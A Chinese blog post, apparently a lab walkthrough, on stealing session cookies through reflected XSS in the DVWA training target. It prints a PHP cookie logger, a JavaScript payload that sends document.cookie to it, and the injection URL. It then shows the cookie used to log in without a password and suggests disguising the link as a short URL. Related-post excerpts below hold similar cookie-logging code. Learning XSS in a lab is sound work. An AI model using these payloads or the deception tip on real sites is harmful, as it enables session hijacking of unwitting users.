本地利用XSS获取cookie

于 2024-09-01 20:25:17 发布
阅读量323 收藏 5
点赞数 6
分类专栏: XSS跨站脚本攻击 文章标签: xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73049307/article/details/141789266
版权

以DVWA靶场的Low难度的XSS(reflected)为例:

创建hacker.php和hacker.js并放到

E:\phpstudy2018\PHPTutorial\WWW\DVWA\vulnerabilities\xss_r中

hacker.php(用于生成用户访问而记录的cookie值的cookie.txt文件)

<?php
$cookie = $_GET['x'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?>

hacker.js(用于引导用户访问hacker.php)

var img = new Image();
img.src="http://127.0.0.1/DVWA/vulnerabilities/xss_r/hacker.php?x=" + document.cookie;
document.body.append(img);

构造payload:

/?name=<script src="http://127.0.0.1/DVWA/vulnerabilities/xss_r/hacker.js" /></script>

将URL地址发给别人,并让其点击输入随便一个name:

http://127.0.0.1/DVWA/vulnerabilities/xss_r/?name=<script src="http://127.0.0.1/DVWA/vulnerabilities/xss_r/hacker.js" /></script>

(这里最好去弄成短链接的形式,避免看出来)

可以看到生成了一个cookie.txt文件,打开就可以看到记录的内容:

再退出登录,尝试直接添加cookie值,并访问index.php

呃,这种方法好像不行?后面本来想直接在火狐浏览器中修改cookie值的,但想起来火狐浏览器本来就存有cookie值,所以换成edge浏览器进行下一步操作了

F12->"应用程序"->"存储"->"cookie",修改cookie值为cookie.txt中的内容:

修改完成之后直接访问http://127.0.0.1/DVWA/index.php

可以看到成功绕过用户名和密码输入,直接登录

拓展:后面了解到用burp抓包改包也行

南暮思鸢
关注
专栏目录
【网络安全】XSSCookie外带攻击姿势及例题详析
等风来
05-19 7249
XSSCookie 外带攻击就是一种针对 Web 应用程序中的 XSS(跨站脚本攻击)漏洞进行的攻击,攻击者通过在 XSS 攻击中注入恶意脚本,从而窃取用户的 Cookie 信息。攻击者通常会利用已经存在的 XSS 漏洞,在受害者的浏览器上注入恶意代码,并将受害者的 Cookie 数据上传到攻击者控制的服务器上,然后攻击者就可以使用该 Cookie 来冒充受害者,执行一些恶意操作,例如盗取用户的账户信息、发起钓鱼攻击等。
XSS漏洞利用——获取cookie
cxrpty的博客
02-20 1773
实验环境:DVWA 实验步骤: 一、在服务器创建一个1.php文件获取cookie值,并将cookie值写入1.txt中 php代码如下: <?php $file=fopen("1.txt","a"); if($_GET['cookie']){ $cookie=$_GET['cookie']; fputs($file,"$cookie\r\n"); } ?> ...
XSS平台搭建及后台使用(cookie获取
最新发布
2302_79885863的博客
04-12 1499
点击XSS后台,这就是我们收集cookie的网站,第一次进入需要初始化,如果你的数据库密码改了的就要去靶场的根目录的pkxss/inc/config.inc.php把链接数据库密码改成一致(案列靶场是这个,反正就是要找到这个配置文件)执行完之做了一个php的重定向,做完上面操作,保存完数据库之后,重新给你访问了一下这个网址,这个网址应该改成存在漏洞的网站的IP。然后我们把留言删除,刚刚我们知识测试是否存在有这个漏洞,然后我们现在想要获取cookie,需要构造代码了。这里的IP是能和虚拟机通信的,
利用 XSS 获取 Cookie 利用DOM XSS
weixin_71416901的博客
06-21 1227
XSS
简单的利用XSS获取用户cookie
shy的博客
10-25 4346
跨站脚本攻击(XSS) 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 这里简单的演示下,将cookie获取到自己的搭...
使用XSS漏洞获取cookies
Decaede的博客
01-26 1268
使用XSS漏洞获取cookies
3-5通过XSS获取cookie以及XSS后台管理系统的使用
山兔的博客
04-23 3913
XSS漏洞测试:cookie获取和钓鱼攻击演示  XSS漏洞测试:cookie的窃取和利用 同时讲到get型xss利用,post型xss利用XSS漏洞测试:钓鱼攻击  XSS漏洞测试:xss获取用户键盘记录 让大家更好的理解xss的危害以及原理 案例1:xss如何获取cookie? GET型XSS利用cookie获取 pkxss管理后台使用介绍 在源码包里面,有一个pkxss,我们可以把这个目录,单独的放在某个目录下面,这个东西其实是一个可以独立使用的后台,我们可以单独的把他放在站点目录下
利用XSS窃取用户Cookie
Monsterlz123的博客
07-20 7322
XSS利用XSS窃取用户Cookie Hello,各位小伙伴周六愉快。 晃眼之间一周又快要过去了,时间是不等人滴~~ 这周准备连发三篇XSS相关内容,两篇实战,一篇总结。 然后XSS漏洞部分就暂时完结啦~~ 今天我们来看看怎么利用XSS窃取用户cookie吧。 一、实验概述 实验拓扑: XSS的用途之一就是窃取用户的cookie,攻击者利用XSS在网站中插入恶意脚本,一旦用户访问该网页...
ctf xss利用_利用存储型XSS跨站漏洞偷取用户Cookie实战
weixin_42611310的博客
02-23 1635
声明 :严禁读者利用以下介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担 , 如果您不能同意该约定 , 请您务必不要阅读该文章 , 感谢您的配合 !攻击者要偷取Cookie , 就要让他们精心构造的恶意代码在受害者的计算机上运行 , 一般来说 , 是在用户访问一个网页的时候执行一段JavaScript代码 , 这段代码会...
DOM型XSS;cookie获取XSS后台使用;XSS钓鱼演示;XSS获取键盘记录实验演示
qq_44696653的博客
04-21 2237
DOM型XSS DOM简介(摘录) 通过JavaScript,可以重构整个HTML文档,可以添加、移除、改变或重排页面上的项目。 要改变页面的某个东西,JavaScript就需要获得对HTML文档中所有元素进行添加、移动、改变或移除的方法和属性,都是通过文档对象模型来获得的(DOM)。 所以就可以将DOM理解为访问HTML的标准编程接口。 DOM型XSS漏洞演示 ...
XSS获取COOKIE
04-20
XSS获取COOKIE
XSS获取cookie利用方式 (ASP版).txt
12-22
XSS获取cookie利用方式简单方法
利用XSS获取cookie
热门推荐
littlecjx
11-04 2万+
如果web应用在用户输入的地方没有过滤特殊字符,比如<, >, ', ", <script>, javascript 等字符,而且在变量输出的地方没有使用安全的编码函数,比如PHP的htmlentities()和htmlspecialchars()函数,JavaScript中的escapeJavascript函数,这样的web应用极易出现XSS漏洞。XSS攻击的危害主要有盗取用户cookie、跳转到
XSS获取cookie
qq_40273198的博客
11-21 4639
   DVWA XSS获取cookie 反射型 一、LOW 1.被害者已经登录http://127.0.0.1/DVWA/vulnerabilities/xss_r/ 网站,该网站存在xss漏洞。 网站源代码如下:未进行任何过滤 &lt;?php header ("X-XSS-Protection: 0"); // Is there any input? if( array_key...
xss获取cookie
kiihuang的博客
03-31 899
主要是借助存储型xss漏洞,来进行攻击的,获取每个访问人的cookie
XSS平台获取cookie
qq_41048303的博客
02-19 3641
XSS平台获取cookie 1.环境介绍 靶场:pikachu XSS平台:BLUE-LOTUS 浏览器:火狐浏览器 2.流程介绍 登录XSS平台,创建获取cookie的脚本 var website = "http://网站地址"; (function() { (new Image()).src = website + '/?keepsession=1&location=' + escape((function() { try { return d
xss -- cookie获取
qq726232111的博客
09-11 690
0x0 cookie 简介 储存在用户本地终端上的数据,服务端可通过session会话获取cookie信息,cookie可用于身份验证,临时存储信息(商城网站的购物车)等 0x1 实验流程 用户点击构造链接 --> 发送cookie到指定服务器 --> 接收cookie保存到文件 0x2 实验环境 实验环境 window+phpstudy+dvwa dvwa中提供...
XSS平台与cookie获取
永远是少年
11-21 1210
今天继续给大家介绍渗透测试相关知识,本文主要内容是XSS平台与cookie获取。 一、XSS攻击目的 二、XSS平台 三、XSS攻击获取cookie简介
网络安全面试必备:对称加密与非对称加密,同源策略详解及XSS盗取cookie风险
- XSS利用已知的用户cookie进行攻击,可能导致未经授权的访问。如果攻击者成功获取cookie,理论上可以通过设置`HTTP_REFERER`来模拟登录,绕过常规的认证流程,实现无密码登录。但这并不意味着总是可行,因为网站...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值